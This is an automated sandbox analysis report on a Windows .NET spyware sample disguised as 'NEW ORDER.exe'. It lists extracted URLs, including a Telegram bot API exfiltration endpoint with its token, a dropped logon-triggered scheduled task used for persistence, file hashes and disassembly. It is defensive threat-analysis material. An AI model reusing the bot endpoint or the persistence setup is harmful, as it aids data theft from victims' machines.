                                  http://www.goodfont.co.krNEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cnFNEW ORDER.exe, 00000000.00000003.233743153.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.233723837.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.carterandcone.comothfNEW ORDER.exe, 00000000.00000003.235118854.0000000005C60000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://api.telegram.org/bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/NEW ORDER.exe, 00000000.00000002.277628722.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000007.00000000.265553300.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.sajatypeworks.comNEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.230277613.0000000005C53000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.typography.netDNEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cn/cTheNEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmNEW ORDER.exe, 00000000.00000003.242718317.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.241924098.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.241560139.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.242251783.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.241387291.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.242063281.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.242521890.0000000005C58000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://fontfabrik.comNEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://api.telegram.org4NEW ORDER.exe, 00000007.00000002.502403797.0000000002C2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.carterandcone.comCuNEW ORDER.exe, 00000000.00000003.235118854.0000000005C60000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.fonts.comnKNEW ORDER.exe, 00000000.00000003.231040731.0000000005C6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.fontbureau.com/designerseNEW ORDER.exe, 00000000.00000003.244166604.0000000005C8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://DynDns.comDynDNSnamejidpasswordPsi/PsiNEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/DPleaseNEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fonts.comNEW ORDER.exe, 00000000.00000003.230978289.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.sajatypeworks.combNEW ORDER.exe, 00000000.00000003.230277613.0000000005C53000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.sandoll.co.krNEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.urwpp.deDPleaseNEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sajatypeworks.comeGNEW ORDER.exe, 00000000.00000003.230277613.0000000005C53000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.zhongyicts.com.cnNEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNEW ORDER.exe, 00000000.00000002.270184623.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000007.00000002.502403797.0000000002C2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designerspNEW ORDER.exe, 00000000.00000003.239168700.0000000005C8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.sakkal.comNEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://api.ipify.org%NEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		low
                                            http://www.fontbureau.com/designerstNEW ORDER.exe, 00000000.00000003.239093431.0000000005C8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.galapagosdesign.com/LNEW ORDER.exe, 00000000.00000003.241408459.0000000005C63000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.apache.org/licenses/LICENSE-2.0NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.fontbureau.comNEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.carterandcone.comdNEW ORDER.exe, 00000000.00000003.235118854.0000000005C60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.founder.com.cn/cnGZNEW ORDER.exe, 00000000.00000003.234068944.0000000005C57000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.234627581.0000000005C56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwNEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.carterandcone.comhNEW ORDER.exe, 00000000.00000003.235118854.0000000005C60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.carterandcone.comlNEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers/cabarga.htmlhNEW ORDER.exe, 00000000.00000003.239721792.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.239784127.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.founder.com.cn/cn/NEW ORDER.exe, 00000000.00000003.234493545.0000000005C56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers/cabarga.htmlNNEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.founder.com.cn/cn.NEW ORDER.exe, 00000000.00000003.234284743.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.234493545.0000000005C56000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.234627581.0000000005C56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.founder.com.cn/cnNEW ORDER.exe, 00000000.00000003.234284743.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.234068944.0000000005C57000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.234493545.0000000005C56000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.235384051.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.234357988.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.234627581.0000000005C56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers/frere-user.htmlNEW ORDER.exe, 00000000.00000003.239369021.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.comoituNEW ORDER.exe, 00000000.00000002.269549647.00000000014D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designers/cabarga.htmlNEW ORDER.exe, 00000000.00000003.239721792.0000000005C58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.monotype.NEW ORDER.exe, 00000000.00000003.240428883.0000000005C69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.comtNEW ORDER.exe, 00000000.00000002.269549647.00000000014D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.jiyu-kobo.co.jp/NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers8NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.fontbureau.comceNEW ORDER.exe, 00000000.00000002.269549647.00000000014D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://gesqcS.comNEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://api.telegram.orgNEW ORDER.exe, 00000007.00000002.502497104.0000000002C3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              149.154.167.220
                                                              		api.telegram.orgUnited Kingdom
                                                              		62041TELEGRAMRUfalse

                                                              Private

                                                              IP
                                                              192.168.2.1

                                                              General Information

                                                              Joe Sandbox Version:35.0.0 Citrine
                                                              Analysis ID:680495
                                                              Start date and time: 08/08/202217:41:112022-08-08 17:41:11 +02:00
                                                              Joe Sandbox Product:CloudBasic
                                                              Overall analysis duration:0h 7m 46s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:light
                                                              Sample file name:NEW ORDER.exe
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                              Number of analysed new started processes analysed:34
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • HDC enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@11/5@1/2
                                                              EGA Information:
                                                              • Successful, ratio: 100%
                                                              HDC Information:Failed
                                                              HCA Information:
                                                              • Successful, ratio: 95%
                                                              • Number of executed functions: 0
                                                              • Number of non-executed functions: 0
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Adjust boot time
                                                              • Enable AMSI

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                              • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                                              • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              17:42:21API Interceptor681x Sleep call for process: NEW ORDER.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              No context

                                                              Domains

                                                              No context

                                                              ASNs

                                                              No context

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERF58F.tmp.csv

                                                              Download File
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):49830
                                                              Entropy (8bit):3.076173619727473
                                                              Encrypted:false
                                                              SSDEEP:1536:D6HlpaNrx5Sm1CXUREWK8vHAVlYUETpm8IydxZr:D6HlpaNrx5Sm1CXUREWK8fAVlYUETpmG
                                                              MD5:41BC3D42B97F306F77B9C51A43A9DB99
                                                              SHA1:ABEBE82847E4CBD2707565F9EA43989619B5964F
                                                              SHA-256:1E5C8B3A9B7348F8C1A462AB8F9BB4B183AE277441AB8F9BCFAA224B7E12D9C4
                                                              SHA-512:079C32034B89D52E0A002919E8E65C1FB706E813DAAEBB40B7129047E42B13141BEED82AB0C82BAE8052D170154737B4D4F75B65884E5029D237622689B17675
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERF87E.tmp.txt

                                                              Download File
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):13340
                                                              Entropy (8bit):2.699353236675257
                                                              Encrypted:false
                                                              SSDEEP:96:kiZYW+CCh1LnYbYFWGvHS+YEZ9Xatni6RWpmwydJnaDbi8xc6IAp3:hZD+CqcOXaZaDb5xctAp3
                                                              MD5:8A4C305545EE8522F44FF572F4B3EE96
                                                              SHA1:676B0F89159679C23DF0E7270693E8991DE18A41
                                                              SHA-256:3AFA4E0F96F039C719583842A43B8540B8390D1D73081FB4856272DEAEC2D854
                                                              SHA-512:E53EF9D5A8570C4850A701553604D1E8CC93B02AD7787E9A36DCE877F4EC4DF81412DA918ACEEB479E6E28A0744F3CFE376887AB16AE9B34866A56F737BCE0DC
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.2.6.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NEW ORDER.exe.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\NEW ORDER.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1216
                                                              Entropy (8bit):5.355304211458859
                                                              Encrypted:false
                                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                              MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                              SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                              SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                              SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                              Malicious:true
                                                              Reputation:high, very likely benign file
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                              C:\Users\user\AppData\Local\Temp\tmp2F70.tmp

                                                              Download File
                                                              Process:C:\Users\user\Desktop\NEW ORDER.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1639
                                                              Entropy (8bit):5.176570919099634
                                                              Encrypted:false
                                                              SSDEEP:24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGeqPtn:cbhK79lNQR/rydbz9I3YODOLNdq3o
                                                              MD5:D5AA884ABE3D992356979DFDD919B7C7
                                                              SHA1:446F3B70108DA9EB94D12C50C19CD6F0D3246900
                                                              SHA-256:2033AB7915223FA9ECB27E540E8E035A947ABE50C7769458C1986E8F821EE3BB
                                                              SHA-512:B1C468E0761BE17D1A0EC8C7F687F9456F7EEDC79D94BC327566CA65829B29DCD1030FBC1B0112773BFDDA4F3DD46397A7DC0A5FF4EBA4BC1716FDE0B9D9325B
                                                              Malicious:true
                                                              Reputation:low
                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

                                                              C:\Users\user\AppData\Roaming\HvabCK.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\NEW ORDER.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):862720
                                                              Entropy (8bit):7.766023507269692
                                                              Encrypted:false
                                                              SSDEEP:12288:5K2iN4JgEexUMfDLBv0QzDHvGtkLwKHkfmsEX4R54rhtjDDgCze9uJ:5K1a+EOUov0+DHOEwbej2wMKe
                                                              MD5:8577851A51C92B4D637B3AC6F58763A1
                                                              SHA1:EB981F97BD164FC30A36EACEFEE119BD90DB9ED9
                                                              SHA-256:F39991524680779F0C158A55FDD1D2C2802D88BC36C341C97B60756312DBE1CC
                                                              SHA-512:1B887CF7BE213D52AB87E0194CDD9F7E99C50FCA39FE7DD7E0652907F04F2DDB4BA8A325B4CB1A65EB0632AA67487DE514F726BA88DB519FBF9E3320AC9463F7
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Reputation:low
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b................. ...........>... ........@.. ....................................@..................................>..S....@.......................`....................................................... ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B.................>......H............q..............XL............................................(....*&..(.....*...s.........s.........s.........s.........s.........*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0.................,.........o....+....9....~.........,2~.........(....o......,.r...p......(....s....z..+..s..........~.........(.....o......(...+..tu....%-.&.+.%(........o................&r;..p..

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):7.766023507269692
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Windows Screen Saver (13104/52) 0.07%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              File name:NEW ORDER.exe
                                                              File size:862720
                                                              MD5:8577851a51c92b4d637b3ac6f58763a1
                                                              SHA1:eb981f97bd164fc30a36eacefee119bd90db9ed9
                                                              SHA256:f39991524680779f0c158a55fdd1d2c2802d88bc36c341c97b60756312dbe1cc
                                                              SHA512:1b887cf7be213d52ab87e0194cdd9f7e99c50fca39fe7dd7e0652907f04f2ddb4ba8a325b4cb1a65eb0632aa67487de514f726ba88db519fbf9e3320ac9463f7
                                                              SSDEEP:12288:5K2iN4JgEexUMfDLBv0QzDHvGtkLwKHkfmsEX4R54rhtjDDgCze9uJ:5K1a+EOUov0+DHOEwbej2wMKe
                                                              TLSH:5805F1F156F97528F034237236D0A07C7BE2E91BDA05D23A5D7B930E9752DC186E2A23
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b................. ...........>... ........@.. ....................................@................................

                                                              File Icon

                                                              Icon Hash:00828e8e8686b000

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x4d3ede
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x62F0F8B1 [Mon Aug 8 11:51:13 2022 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                              Entrypoint Preview

                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
